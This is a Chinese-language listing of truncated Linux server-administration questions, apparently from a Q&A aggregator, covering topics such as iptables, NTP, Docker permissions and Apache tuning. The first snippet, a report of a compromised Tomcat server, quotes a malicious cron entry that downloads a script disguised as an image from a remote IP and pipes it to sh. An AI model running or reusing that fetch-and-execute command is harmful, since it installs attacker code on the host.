-
linux – 通过未知来源的cron对Apache服务器进行Shell脚本攻击
所属栏目:[Linux] 日期:2020-12-13 热度:71
在Apache tomcat服务器上运行项目战争时,我发现服务器已被入侵. 虽然在一个未知的cron上运行战争就像这样运行 [root@App2 tmp]# crontab -l -u tomcat*/11 * * * * wget -O - -q http://91.230.47.40/pics/logo.jpg|sh*/12 * * * * curl http://91.230.47.40[详细]
-
linux – Ubuntu上的低延迟TCP设置
所属栏目:[Linux] 日期:2020-12-13 热度:164
在我的实验室中有一个用于在Ubuntu上运行测量的服务器.并且有C程序,它通过TCP连接接收数据,并应尽快发送回复. 组态 CPU:2个处理器x 4个核心 – 英特尔(R)Xeon(R)CPU E5345 @ 2.33GHz RAM:12 GB NIC:Intel Corporation 80003ES2LAN千兆以太网控制器/ 82546[详细]
-
linux – Postmaster使用过多的CPU和磁盘写入
所属栏目:[Linux] 日期:2020-12-13 热度:70
使用PostgreSQL 9.1.2 我看到过多的CPU使用率和来自postmaster任务的大量磁盘写入.即使我的应用程序几乎什么都没做(每MINUTE插入10次),也会发生这种情况.然而,有合理数量的连接打开. 我一直试图确定我的应用程序中是什么导致了这一点.我很喜欢postgresql,到[详细]
-
linux – Nagios服务器的最佳实践?
所属栏目:[Linux] 日期:2020-12-13 热度:102
我运行一个中型Nagios服务器.它目前监控大约40台服务器,提供180项服务,并且只在当天增长. 我从一个以非常深奥的方式配置的旧Nagios设置迁移,迫使我从头开始重新配置所有内容. 现在服务器正在运行并且可以满足我们所需要的大部分工作,我正在考虑使它更具可扩[详细]
-
linux – 用于基本HTTP(s)Web服务器的安全标准iptables规则集
所属栏目:[Linux] 日期:2020-12-13 热度:146
我一直试图整理一个基本的服务器iptables脚本,该脚本适用于使用HTTP(S)和SSH(端口80,443和22)运行基本Web服务器的大多数站点.毕竟,大多数VPS只需要这些起始端口规则,并可以根据需要稍后添加邮件或游戏端口. 到目前为止,我有以下规则集,我想知道是否有人知道[详细]
-
在Linux上使用Apache HTTP Server进行集成Windows身份验证
所属栏目:[Linux] 日期:2020-12-13 热度:69
为Apache2 / Linux上运行的 PHP Web应用程序启用 Integrated Windows Authentication的最佳方法是什么?网络中有一个Windows域控制器,应该用于身份验证. 我找到了这些apache模块: mod_auth_kerb mod_auth_ntlm_winbind 但这些模块似乎非常过时(最新更新2007[详细]
-
linux – 重新安装相同的文件系统,不同的选项会破坏当前的操作吗
所属栏目:[Linux] 日期:2020-12-13 热度:90
我想在SLES11上重新安装具有优化选项(noatime,nobarrier等)的文件系统.我打算首先更新/ etc / fstab,然后执行mount -o remount / srv / share之类的操作.问题是这个文件系统上有几个活动虚拟机的图像通过NFS导出,我在想是否可以在不关闭它的情况下完成重新安[详细]
-
linux – 如何删除目录中的“._”文件? Ubuntu的
所属栏目:[Linux] 日期:2020-12-13 热度:92
是否有命令行删除Unbuntu上目录中的所有“._foo.html”文件? 解决方法 rm ./._* 更多的东西,因为它必须至少15个字符.[详细]
-
linux – 我可以允许root用户su吗?
所属栏目:[Linux] 日期:2020-12-13 热度:61
我有5个帐户的centos VPS;然后我启用了一个用户ssh,禁用root登录,并禁用每个其他用户帐户的 shell .. 这些用户的ssh直接访问是否被禁用,是否可以允许root用户su? 解决方法 是的,前提是您禁用了root的ssh访问而不是root本身. 但是,对于具有禁用shell的帐户,[详细]
-
linux – Apache prefork optimization – 选择正确的`MaxReques
所属栏目:[Linux] 日期:2020-12-13 热度:162
我正在尝试优化我们的Web服务器以处理尽可能多的连接.我读了很多帖子和Apache笔记.我试图了解我应该为MaxRequestsPerChild选择哪个值. 起初,我已经尝试将其设置为4,000,但服务器很难处理许多请求,所以我开始提高它.目前我的设置是: IfModule prefork.cStart[详细]
-
linux – 为什么Jenkins用户没有权限访问Docker unix套接字?
所属栏目:[Linux] 日期:2020-12-13 热度:53
我已经将jenkins用户添加到docker组,认为它允许Jenkins作业运行Docker命令.如果我切换到jenkins用户,我可以验证它是否有效(手动): ubuntu@hostname:~$ps aux | grep javajenkins 2210 9.5 7.5 1950316 292896 ? Sl 00:01 1:00 /usr/bin/java -jar /data/jen[详细]
-
Linux支持代理PAC文件
所属栏目:[Linux] 日期:2020-12-13 热度:80
我的公司环境设置了代理阻止外部Internet访问并需要NTLM身份验证.内部地址不会被路由为代理,必须直接访问. 我正在尝试在此环境(通常是Windows)中设置Linux计算机,并且具有需要外部Internet访问的命令行工具.我发现NTLMaps对于代理进行身份验证非常有用 – 但[详细]
-
linux – 使用GPS时钟看似质量差的NTP时间同步
所属栏目:[Linux] 日期:2020-12-13 热度:126
我有一台 Linux服务器,它的时间与附近的基于GPS的NTP设备同步.从服务器到设备的Ping时间约为1ms,抖动非常低: --- x.x.x.x ping statistics ---100 packets transmitted,100 received,0% packet loss,time 99001msrtt min/avg/max/mdev = 0.874/0.957/1.052/[详细]
-
linux – 如何判断我的服务器是否具有某种IPMI?
所属栏目:[Linux] 日期:2020-12-13 热度:150
我从来没有见过我管理的 Linux服务器.如何确定是否安装了某种IPMI? 我尝试通过安装ipmitool回答我自己的问题: Setting up ipmitool (1.8.9-2) ...Starting IPMI event daemon ipmievdipmievd: using pidfile /var/run/ipmievd.pid0Could not open device a[详细]
-
文件在linux服务器上消失了
所属栏目:[Linux] 日期:2020-12-13 热度:103
我有4个特定的文件似乎一直在从用户的主目录中消失.据我们所知,没有cronjobs或其他自动化任务可以删除它们.我已经对它们进行了审计,但日志并没有真正显示出任何有趣的内容.我可以看到我们的备份实用程序每晚都访问它们,直到它们不再存在,但没有别的.有没有什[详细]
-
linux – 当我重新启动Ubuntu服务器时如何重新启动sphinx?
所属栏目:[Linux] 日期:2020-12-13 热度:139
我在我的ubuntu 9.04服务器上构建并安装了sphinx搜索. 重启后如何让sphinx守护程序自动启动? 解决方法 我不知道Sphinx,但这是基本的方法.使用以下内容创建一个文件/etc/init.d/searchd(也有 this script,但您可能需要稍微调整一下): #!/bin/bashcase "${1:[详细]
-
linux – upstart看不到我的工作
所属栏目:[Linux] 日期:2020-12-13 热度:120
在Ubuntu 12.10中 user@xyz:~$sudo initctl --versioninitctl (upstart 1.5)Copyright (C) 2012 Scott James Remnant,Canonical Ltd.This is free software; see the source for copying conditions. There is NOwarranty; not even for MERCHANTABILITY or[详细]
-
linux – 用于小型虚拟专用服务器?
所属栏目:[Linux] 日期:2020-12-13 热度:168
我租了一个小的VPS(约130MB的RAM)来运行一个IRC机器人.不再需要僵尸程序,所以我在计费期结束前有一个VPS. 我也有共享的虚拟主机,但任何人都可以想到VPS可能对共享主机无法做什么有用吗? 我是网络和桌面应用程序的开发人员. 对更大的VPS的建议也欢迎. 解决方[详细]
-
linux – 如何让sec正确忽略时间戳
所属栏目:[Linux] 日期:2020-12-13 热度:78
我有一个像这样设置的规则; 在/etc/sec/rules.d我有; type=SingleWithSuppressptype=regexppattern=(S+) sshd[d+]: PAM d+ more authentication failures; logname=.* uid=.* euid=.* tty=ssh ruser=.* rhost=(.*) user=(.*)desc=Login Failure: $0act[详细]
-
Linux和SVN:如何删除所有版本化文件但KEEP目录结构,忽略.svn di
所属栏目:[Linux] 日期:2020-12-13 热度:161
我想从我的存储库中删除所有版本化的文件,但保留版本化的目录结构.显然我想保持所有.svn目录不变. 换句话说,我想完全清空工作副本的目录结构,而不会损害目录结构本身. 例如,从此结构中删除文件: dir/ .svn/ [files] svsubdir1/ file1 .svn/ [files] subdir2[详细]
-
有没有办法强制我的Linux机箱始终使用自我分配的IP地址启动?
所属栏目:[Linux] 日期:2020-12-13 热度:116
这可能是一个不寻常的请求:我试图让Debian Linux盒子在启动时始终给自己一个自己分配的IP地址(即169.254.x.y).特别是,即使LAN上存在DHCP服务器,我也希望它能够做到这一点.也就是说,它不应该从DHCP服务器请求IP地址. 从我在“man interfaces”文本中可以看到[详细]
-
linux – 如何判断哪个内核模块正在为/ dev设备提供服务?
所属栏目:[Linux] 日期:2020-12-13 热度:113
如何找出哪个内核模块(通过键入lsmod看到)正在为/ dev中的特定设备提供服务? 换句话说,我说有一个设备,/ dev / mouse0,我想知道安装了哪个内核模块来为该设备提供服务.我怎么做? 另一种看待这种情况的方法是,一些加载的内核模块将自己与/ dev中的设备相关[详细]
-
linux – 在/etc/init.d脚本中调用守护进程是阻塞的,而不是在后
所属栏目:[Linux] 日期:2020-12-13 热度:69
我有一个我想要守护的Perl脚本.基本上这个perl脚本每隔30秒读取一个目录,读取它找到的文件,然后处理数据.为了简单起见,请考虑以下Perl脚本(称为synpipe_server,在/usr/sbin /中有此脚本的符号链接): #!/usr/bin/perluse strict;use warnings;my $continue =[详细]
-
linux – 解释ethtool Coalesce输出
所属栏目:[Linux] 日期:2020-12-13 热度:186
除了tx和rx是传输和接收之外,任何人都可以解释这些字段在ethtool -c(Coalescing output)中的含义以及它们对于聚结的工作方式有何影响? Coalesce parameters for eth0:Adaptive RX: off TX: offstats-block-usecs: 999936sample-interval: 0pkt-rate-low: 0p[详细]
-
linux – 将队列规则重置为默认的pfifo_fast?
所属栏目:[Linux] 日期:2020-12-13 热度:145
我正在尝试暂时设置速率限制队列规则,然后稍后删除它: # /sbin/tc qdisc add dev eth1 root tbf rate 600kbit latency 50ms burst 1540# /sbin/tc qdisc del dev eth1 root 不幸的是,这完全消除了队列规则,并在队列被删除后阻止传出数据传输工作. 我希望能[详细]
